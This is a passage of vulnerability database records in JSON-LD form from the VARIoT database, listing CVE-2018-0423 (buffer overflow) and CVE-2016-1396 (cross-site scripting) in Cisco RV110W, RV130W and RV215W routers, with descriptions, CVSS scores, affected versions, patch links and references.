"id": "CVE-2019-1663"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"db": "BID",
"id": "107185"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"date": "2022-05-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"date": "2019-02-28T00:00:00",
"db": "VULHUB",
"id": "VHN-148795"
},
{
"date": "2019-02-28T00:00:00",
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"date": "2019-02-27T00:00:00",
"db": "BID",
"id": "107185"
},
{
"date": "2019-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"date": "2019-02-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"date": "2019-02-28T18:29:02.040000",
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"date": "2022-05-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"date": "2020-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-148795"
},
{
"date": "2020-10-05T00:00:00",
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"date": "2019-02-27T00:00:00",
"db": "BID",
"id": "107185"
},
{
"date": "2019-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"date": "2019-03-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"date": "2024-11-21T04:37:02.680000",
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco RV Vulnerability related to input validation in products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
}
],
"trust": 0.6
}
}
var-201810-0301
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products.
A buffer overflow vulnerability exists in the management interfaces of many Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. This issue being tracked by Cisco Bug ID CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0301",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 2.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 2.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 1.2,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "*"
},
{
"model": "rv130w wireless-n multifunction vpn routerr",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "small business rv series routers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "small business rv series routers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.8"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv215w wireless-n vpn",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "BID",
"id": "105285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Qingtang Zheng of 360 ESG CodeSafe.",
"sources": [
{
"db": "BID",
"id": "105285"
}
],
"trust": 0.3
},
"cve": "CVE-2018-0423",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-0423",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-17682",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-18074",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-118625",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2018-0423",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-0423",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-0423",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-17682",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-18074",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-254",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-118625",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "VULHUB",
"id": "VHN-118625"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code. The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code. The Cisco RV110W, RV130W, and RV215W are Cisco router products. \n\nA buffer overflow vulnerability exists in the management interfaces of many Cisco routers. Cisco RV110W, RV130W, and RV215W Routers are prone to a buffer-overflow vulnerability because they fail to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed exploit attempts will result in denial-of-service conditions. \nThis issue being tracked by Cisco Bug ID CSCvj23206, CSCvj42727, and CSCvj42729. Cisco RV110W Wireless-N VPN Firewall is a firewall product",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-0423"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "BID",
"id": "105285"
},
{
"db": "VULHUB",
"id": "VHN-118625"
}
],
"trust": 3.06
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-0423",
"trust": 4.0
},
{
"db": "BID",
"id": "105285",
"trust": 2.0
},
{
"db": "SECTRACK",
"id": "1041675",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-17682",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-18074",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-118625",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "VULHUB",
"id": "VHN-118625"
},
{
"db": "BID",
"id": "105285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"id": "VAR-201810-0301",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "VULHUB",
"id": "VHN-118625"
}
],
"trust": 1.8900693866666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
}
]
},
"last_update_date": "2024-11-23T22:00:16.772000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20180905-rv-routers-overflow",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-overflow"
},
{
"title": "Patch for Cisco Router Management Interface Buffer Overflow Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/139767"
},
{
"title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84585"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-118625"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-overflow"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/105285"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1041675"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0423"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-0423"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "VULHUB",
"id": "VHN-118625"
},
{
"db": "BID",
"id": "105285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"db": "VULHUB",
"id": "VHN-118625"
},
{
"db": "BID",
"id": "105285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"date": "2018-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"date": "2018-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-118625"
},
{
"date": "2018-09-05T00:00:00",
"db": "BID",
"id": "105285"
},
{
"date": "2018-12-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"date": "2018-09-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"date": "2018-10-05T14:29:00.857000",
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17682"
},
{
"date": "2018-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18074"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-118625"
},
{
"date": "2018-09-05T00:00:00",
"db": "BID",
"id": "105285"
},
{
"date": "2018-12-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010561"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-254"
},
{
"date": "2024-11-21T03:38:11.887000",
"db": "NVD",
"id": "CVE-2018-0423"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco RV Product Buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010561"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-254"
}
],
"trust": 0.6
}
}
var-201606-0432
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in the web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, aka Bug ID CSCux82583. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201606-0432",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.6"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.15"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.0.21"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.1.4"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.0.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.9"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.14"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.0.10"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.3.16"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco would like to thank security researcher Samuel Huntley for finding and reporting this vulnerability.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
}
],
"trust": 0.6
},
